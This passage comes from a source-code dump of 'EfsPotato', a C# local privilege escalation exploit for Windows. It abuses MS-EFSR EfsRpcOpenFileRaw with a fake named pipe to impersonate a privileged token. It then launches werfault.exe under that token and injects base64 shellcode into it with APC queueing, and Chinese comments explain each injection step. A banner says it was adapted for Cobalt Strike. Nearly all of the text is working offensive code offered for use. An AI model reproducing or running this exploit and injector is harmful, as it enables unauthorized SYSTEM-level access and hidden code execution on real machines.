94 | Marshal.FreeHGlobal(pfn);
95 | }
96 | return (int)result.ToInt64();
97 | }
98 | private byte[] MIDL_ProcFormatString;
99 | private byte[] MIDL_TypeFormatString;
100 | private GCHandle procString;
101 | private GCHandle formatString;
102 | private GCHandle stub;
103 | private GCHandle faultoffsets;
104 | private GCHandle clientinterface;
105 | private string PipeName;
106 |
107 | allocmemory AllocateMemoryDelegate = AllocateMemory;
108 | freememory FreeMemoryDelegate = FreeMemory;
109 |
110 | public UInt32 RPCTimeOut = 5000;
111 |
112 | protected void InitializeStub(Guid interfaceID, byte[] MIDL_ProcFormatString, byte[] MIDL_TypeFormatString, string pipe, ushort MajorVerson, ushort MinorVersion)
113 | {
114 | this.MIDL_ProcFormatString = MIDL_ProcFormatString;
115 | this.MIDL_TypeFormatString = MIDL_TypeFormatString;
116 | PipeName = pipe;
117 | procString = GCHandle.Alloc(this.MIDL_ProcFormatString, GCHandleType.Pinned);
118 |
119 | RPC_CLIENT_INTERFACE clientinterfaceObject = new RPC_CLIENT_INTERFACE(interfaceID, MajorVerson, MinorVersion);
120 |
121 | COMM_FAULT_OFFSETS commFaultOffset = new COMM_FAULT_OFFSETS();
122 | commFaultOffset.CommOffset = -1;
123 | commFaultOffset.FaultOffset = -1;
124 | faultoffsets = GCHandle.Alloc(commFaultOffset, GCHandleType.Pinned);
125 | clientinterface = GCHandle.Alloc(clientinterfaceObject, GCHandleType.Pinned);
126 | formatString = GCHandle.Alloc(MIDL_TypeFormatString, GCHandleType.Pinned);
127 |
128 | MIDL_STUB_DESC stubObject = new MIDL_STUB_DESC(formatString.AddrOfPinnedObject(),
129 | clientinterface.AddrOfPinnedObject(),
130 | Marshal.GetFunctionPointerForDelegate(AllocateMemoryDelegate),
131 | Marshal.GetFunctionPointerForDelegate(FreeMemoryDelegate));
132 |
133 | stub = GCHandle.Alloc(stubObject, GCHandleType.Pinned);
134 | }
135 |
136 |
137 | protected void freeStub()
138 | {
139 | procString.Free();
140 | faultoffsets.Free();
141 | clientinterface.Free();
142 | formatString.Free();
143 | stub.Free();
144 | }
145 |
146 | delegate IntPtr allocmemory(int size);
147 |
148 | protected static IntPtr AllocateMemory(int size)
149 | {
150 | IntPtr memory = Marshal.AllocHGlobal(size);
151 | return memory;
152 | }
153 |
154 | delegate void freememory(IntPtr memory);
155 |
156 | protected static void FreeMemory(IntPtr memory)
157 | {
158 | Marshal.FreeHGlobal(memory);
159 | }
160 |
161 |
162 | protected IntPtr Bind(IntPtr IntPtrserver)
163 | {
164 | string server = Marshal.PtrToStringUni(IntPtrserver);
165 | IntPtr bindingstring = IntPtr.Zero;
166 | IntPtr binding = IntPtr.Zero;
167 | Int32 status;
168 | status = RpcStringBindingCompose(interfaceId.ToString(), "ncacn_np", server, PipeName, null, out bindingstring);
169 | if (status != 0)
170 | {
171 | Console.WriteLine("[x] RpcStringBindingCompose failed with status 0x" + status.ToString("x"));
172 | return IntPtr.Zero;
173 | }
174 | status = RpcBindingFromStringBinding(Marshal.PtrToStringUni(bindingstring), out binding);
175 | RpcBindingFree(ref bindingstring);
176 | if (status != 0)
177 | {
178 | Console.WriteLine("[x] RpcBindingFromStringBinding failed with status 0x" + status.ToString("x"));
179 | return IntPtr.Zero;
180 | }
181 |
182 | status = RpcBindingSetOption(binding, 12, new IntPtr(RPCTimeOut));
183 | if (status != 0)
184 | {
185 | Console.WriteLine("[x] RpcBindingSetOption failed with status 0x" + status.ToString("x"));
186 | }
187 | Console.WriteLine("[!] binding ok (handle=" + binding.ToString("x") + ")");
188 | return binding;
189 | }
190 |
191 | protected IntPtr GetProcStringHandle(int offset)
192 | {
193 | return Marshal.UnsafeAddrOfPinnedArrayElement(MIDL_ProcFormatString, offset);
194 | }
195 |
196 | protected IntPtr GetStubHandle()
197 | {
198 | return stub.AddrOfPinnedObject();
199 | }
200 | protected IntPtr CallNdrClientCall2x86(int offset, params IntPtr[] args)
201 | {
202 |
203 | GCHandle stackhandle = GCHandle.Alloc(args, GCHandleType.Pinned);
204 | IntPtr result;
205 | try
206 | {
207 | result = NdrClientCall2x86(GetStubHandle(), GetProcStringHandle(offset), stackhandle.AddrOfPinnedObject());
208 | }
209 | finally
210 | {
211 | stackhandle.Free();
212 | }
213 | return result;
214 | }
215 | }
216 | }
217 |
--------------------------------------------------------------------------------
/EfsPotato/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.ComponentModel;
4 | using System.Threading;
5 | using System.Security.Principal;
6 | using Microsoft.Win32.SafeHandles;
7 | using static EfsPotato.APIDef;
8 |
9 |
10 | namespace EfsPotato
11 | {
12 | class Program
13 | {
14 | static void Main(string[] args)
15 | {
16 | Console.WriteLine("[+] Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).");
17 | Console.WriteLine("[+] Part of GMH's fuck Tools, Code By zcgonvh, fixed by L.N. for cobaltstrike.");
18 | if (args.Length < 1)
19 | {
20 | Console.WriteLine("usage: EfsPotato ");
21 | Console.WriteLine();
22 | return;
23 | }
24 | LUID_AND_ATTRIBUTES[] l = new LUID_AND_ATTRIBUTES[1];
25 | using (WindowsIdentity wi = WindowsIdentity.GetCurrent())
26 | {
27 | Console.WriteLine("[+] Current user: " + wi.Name);
28 | LookupPrivilegeValue(null, "SeImpersonatePrivilege", out l[0].Luid);
29 | TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
30 | tp.PrivilegeCount = 1;
31 | tp.Privileges = l;
32 | l[0].Attributes = 2;
33 | if (!AdjustTokenPrivileges(wi.Token, false, ref tp, Marshal.SizeOf(tp), IntPtr.Zero, IntPtr.Zero) || Marshal.GetLastWin32Error() != 0)
34 | {
35 | Console.WriteLine("[x] SeImpersonatePrivilege not held.");
36 | return;
37 | }
38 | }
39 | string g = Guid.NewGuid().ToString("d");
40 | string fake = @"\\.\pipe\" + g + @"\pipe\srvsvc";
41 | var hPipe = CreateNamedPipe(fake, 3, 0, 10, 2048, 2048, 0, IntPtr.Zero);
42 | if (hPipe == new IntPtr(-1))
43 | {
44 | Console.WriteLine("[x] can not create pipe: " + new Win32Exception(Marshal.GetLastWin32Error()).Message);
45 | return;
46 | }
47 | ManualResetEvent mre = new ManualResetEvent(false);
48 | var tn = new Thread(NamedPipeThread);
49 | tn.IsBackground = true;
50 | tn.Start(new object[] { hPipe, mre });
51 | var tn2 = new Thread(RpcThread);
52 | tn2.IsBackground = true;
53 | tn2.Start(g);
54 | if (mre.WaitOne(1000))
55 | {
56 | if (ImpersonateNamedPipeClient(hPipe))
57 | {
58 | IntPtr tkn = WindowsIdentity.GetCurrent().Token;
59 | Console.WriteLine("[+] Get Token: " + tkn);
60 | SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();
61 | sa.nLength = Marshal.SizeOf(sa);
62 | sa.pSecurityDescriptor = IntPtr.Zero;
63 | sa.bInheritHandle = 1;
64 | IntPtr hRead, hWrite;
65 | CreatePipe(out hRead, out hWrite, ref sa, 1024);
66 | PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
67 | STARTUPINFO si = new STARTUPINFO();
68 | si.cb = Marshal.SizeOf(si);
69 | si.hStdError = hWrite;
70 | si.hStdOutput = hWrite;
71 | si.lpDesktop = "WinSta0\\Default";
72 | si.dwFlags = 0x101;
73 | si.wShowWindow = 0;
74 | //if (CreateProcessAsUser(tkn, null, args[0], IntPtr.Zero, IntPtr.Zero, true, 0x08000000, IntPtr.Zero, IntPtr.Zero, ref si, out pi))
75 | //{
76 | // Console.WriteLine("[!] process with pid: {0} created.\r\n==============================", pi.dwProcessId);
77 | // tn = new Thread(ReadThread);
78 | // tn.IsBackground = true;
79 | // tn.Start(hRead);
80 | // new ProcessWaitHandle(new SafeWaitHandle(pi.hProcess, false)).WaitOne(-1);
81 | // tn.Abort();
82 | // CloseHandle(pi.hProcess);
83 | // CloseHandle(pi.hThread);
84 | // CloseHandle(tkn);
85 | // CloseHandle(hWrite);
86 | // CloseHandle(hRead);
87 | //}
88 |
89 | //傀儡进程我使用的是werfault.exe,可以自定义。
90 | if (CreateProcessAsUser(tkn, @"c:\Windows\System32\werfault.exe", null, IntPtr.Zero, IntPtr.Zero, true, 0x08000000, IntPtr.Zero, IntPtr.Zero, ref si, out pi))
91 | {
92 |
93 | // 获取shellcode,shellcode是一个base64的字符串
94 | string shellcode = args[0];
95 | byte[] b_shellcode = Convert.FromBase64String(shellcode);
96 |
97 | // 分配内存PAGE_READWRITE
98 | IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, b_shellcode.Length, MEM_COMMIT, PAGE_READWRITE);
99 | IntPtr bytesWritten = IntPtr.Zero;
100 |
101 | // 写入shellcode
102 | //Marshal.Copy(b_shellcode, 0, resultPtr, b_shellcode.Length);
103 | bool resultBool = WriteProcessMemory(pi.hProcess, resultPtr, b_shellcode, b_shellcode.Length, out bytesWritten);
104 |
105 | // 打开线程
106 | IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
107 | uint oldProtect = 0;
108 |
109 | // 修改内存权限PAGE_EXECUTE_READ
110 | resultBool = VirtualProtectEx(pi.hProcess, resultPtr, b_shellcode.Length, PAGE_EXECUTE_READ, out oldProtect);
111 |
112 | // 把shellcode地址加入apc队列
113 | IntPtr ptr = QueueUserAPC(resultPtr, sht, IntPtr.Zero);
114 |
115 | IntPtr ThreadHandle = pi.hThread;
116 | ResumeThread(ThreadHandle);
117 |
118 | Console.WriteLine("[!] process with pid: {0} created.\r\n", pi.dwProcessId);
119 | }
120 | }
121 | }
122 | else
123 | {
124 | Console.WriteLine("[x] operation timed out.");
125 | CreateFile(fake, 1073741824, 0, IntPtr.Zero, 3, 0x80, IntPtr.Zero);//force cancel async operation
126 | }
127 | CloseHandle(hPipe);
128 | }
129 |
130 | //static void ReadThread(object o)
131 | //{
132 | // IntPtr p = (IntPtr)o;
133 | // FileStream fs = new FileStream(p, FileAccess.Read, false);
134 | // StreamReader sr = new StreamReader(fs, Console.OutputEncoding);
135 | // while (true)
136 | // {
137 | // string s = sr.ReadLine();
138 | // if (s == null) { break; }
139 | // Console.WriteLine(s);
140 | // }
141 | //}
142 | static void RpcThread(object o)
143 | {
144 | string g = o as string;
145 | EfsrTiny r = new EfsrTiny();
146 | IntPtr hHandle = IntPtr.Zero;
147 | try
148 | {
149 | r.EfsRpcOpenFileRaw(out hHandle, "\\\\localhost/PIPE/" + g + "/\\" + g + "\\" + g, 0);
150 | }
151 | catch (Exception ex)
152 | {
153 | Console.WriteLine(ex);
154 | }
155 | }
156 |
157 | static void NamedPipeThread(object o)
158 | {
159 | object[] objs = o as object[];
160 | IntPtr pipe = (IntPtr)objs[0];
161 | ManualResetEvent mre = objs[1] as ManualResetEvent;
162 | if (mre != null)
163 | {
164 | ConnectNamedPipe(pipe, IntPtr.Zero);
165 | mre.Set();
166 | }
167 | }
168 |
169 |
170 | }
171 | //copy from bcl
172 | internal class ProcessWaitHandle : WaitHandle
173 | {
174 | internal ProcessWaitHandle(SafeWaitHandle processHandle)
175 | {
176 | base.SafeWaitHandle = processHandle;
177 | }
178 | }
179 |
180 |
181 | [StructLayout(LayoutKind.Sequential)]
182 | struct COMM_FAULT_OFFSETS
183 | {
184 | public short CommOffset;
185 | public short FaultOffset;
186 | }
187 |
188 | [StructLayout(LayoutKind.Sequential)]
189 | struct RPC_VERSION
190 | {
191 | public ushort MajorVersion;
192 | public ushort MinorVersion;
193 | public RPC_VERSION(ushort InterfaceVersionMajor, ushort InterfaceVersionMinor)
194 | {
195 | MajorVersion = InterfaceVersionMajor;
196 | MinorVersion = InterfaceVersionMinor;
197 | }
198 | }
199 |
200 | [StructLayout(LayoutKind.Sequential)]
201 | struct RPC_SYNTAX_IDENTIFIER
202 | {
203 | public Guid SyntaxGUID;
204 | public RPC_VERSION SyntaxVersion;
205 | }
206 |
207 | [StructLayout(LayoutKind.Sequential)]
208 | struct RPC_CLIENT_INTERFACE
209 | {
210 | public uint Length;
211 | public RPC_SYNTAX_IDENTIFIER InterfaceId;
212 | public RPC_SYNTAX_IDENTIFIER TransferSyntax;
213 | public IntPtr /*PRPC_DISPATCH_TABLE*/ DispatchTable;
214 | public uint RpcProtseqEndpointCount;
215 | public IntPtr /*PRPC_PROTSEQ_ENDPOINT*/ RpcProtseqEndpoint;
216 | public IntPtr Reserved;
217 | public IntPtr InterpreterInfo;
218 | public uint Flags;
219 |
220 | public static Guid IID_SYNTAX = new Guid(0x8A885D04u, 0x1CEB, 0x11C9, 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60);
221 |
222 | public RPC_CLIENT_INTERFACE(Guid iid, ushort InterfaceVersionMajor, ushort InterfaceVersionMinor)
223 | {
224 | Length = (uint)Marshal.SizeOf(typeof(RPC_CLIENT_INTERFACE));
225 | RPC_VERSION rpcVersion = new RPC_VERSION(InterfaceVersionMajor, InterfaceVersionMinor);
226 | InterfaceId = new RPC_SYNTAX_IDENTIFIER();
227 | InterfaceId.SyntaxGUID = iid;
228 | InterfaceId.SyntaxVersion = rpcVersion;
229 | rpcVersion = new RPC_VERSION(2, 0);
230 | TransferSyntax = new RPC_SYNTAX_IDENTIFIER();
231 | TransferSyntax.SyntaxGUID = IID_SYNTAX;
232 | TransferSyntax.SyntaxVersion = rpcVersion;
233 | DispatchTable = IntPtr.Zero;
234 | RpcProtseqEndpointCount = 0u;
235 | RpcProtseqEndpoint = IntPtr.Zero;
236 | Reserved = IntPtr.Zero;
237 | InterpreterInfo = IntPtr.Zero;
238 | Flags = 0u;
239 | }
240 | }
241 |
242 | [StructLayout(LayoutKind.Sequential)]
243 | struct MIDL_STUB_DESC
244 | {
245 | public IntPtr /*RPC_CLIENT_INTERFACE*/ RpcInterfaceInformation;
246 | public IntPtr pfnAllocate;
247 | public IntPtr pfnFree;
248 | public IntPtr pAutoBindHandle;
249 | public IntPtr /*NDR_RUNDOWN*/ apfnNdrRundownRoutines;
250 | public IntPtr /*GENERIC_BINDING_ROUTINE_PAIR*/ aGenericBindingRoutinePairs;
251 | public IntPtr /*EXPR_EVAL*/ apfnExprEval;
252 | public IntPtr /*XMIT_ROUTINE_QUINTUPLE*/ aXmitQuintuple;
253 | public IntPtr pFormatTypes;
254 | public int fCheckBounds;
255 | /* Ndr library version. */
256 | public uint Version;
257 | public IntPtr /*MALLOC_FREE_STRUCT*/ pMallocFreeStruct;
258 | public int MIDLVersion;
259 | public IntPtr CommFaultOffsets;
260 | // New fields for version 3.0+
261 | public IntPtr /*USER_MARSHAL_ROUTINE_QUADRUPLE*/ aUserMarshalQuadruple;
262 | // Notify routines - added for NT5, MIDL 5.0
263 | public IntPtr /*NDR_NOTIFY_ROUTINE*/ NotifyRoutineTable;
264 | public IntPtr mFlags;
265 | // International support routines - added for 64bit post NT5
266 | public IntPtr /*NDR_CS_ROUTINES*/ CsRoutineTables;
267 | public IntPtr ProxyServerInfo;
268 | public IntPtr /*NDR_EXPR_DESC*/ pExprInfo;
269 | // Fields up to now present in win2000 release.
270 |
271 | public MIDL_STUB_DESC(IntPtr pFormatTypesPtr, IntPtr RpcInterfaceInformationPtr,
272 | IntPtr pfnAllocatePtr, IntPtr pfnFreePtr)
273 | {
274 | pFormatTypes = pFormatTypesPtr;
275 | RpcInterfaceInformation = RpcInterfaceInformationPtr;
276 | CommFaultOffsets = IntPtr.Zero;
277 | pfnAllocate = pfnAllocatePtr;
278 | pfnFree = pfnFreePtr;
279 | pAutoBindHandle = IntPtr.Zero;
280 | apfnNdrRundownRoutines = IntPtr.Zero;
281 | aGenericBindingRoutinePairs = IntPtr.Zero;
282 | apfnExprEval = IntPtr.Zero;
283 | aXmitQuintuple = IntPtr.Zero;
284 | fCheckBounds = 1;
285 | Version = 0x50002u;
286 | pMallocFreeStruct = IntPtr.Zero;
287 | MIDLVersion = 0x801026e;
288 | aUserMarshalQuadruple = IntPtr.Zero;
289 | NotifyRoutineTable = IntPtr.Zero;
290 | mFlags = new IntPtr(0x00000001);
291 | CsRoutineTables = IntPtr.Zero;
292 | ProxyServerInfo = IntPtr.Zero;
293 | pExprInfo = IntPtr.Zero;
294 | }
295 | }
296 | }
297 |
--------------------------------------------------------------------------------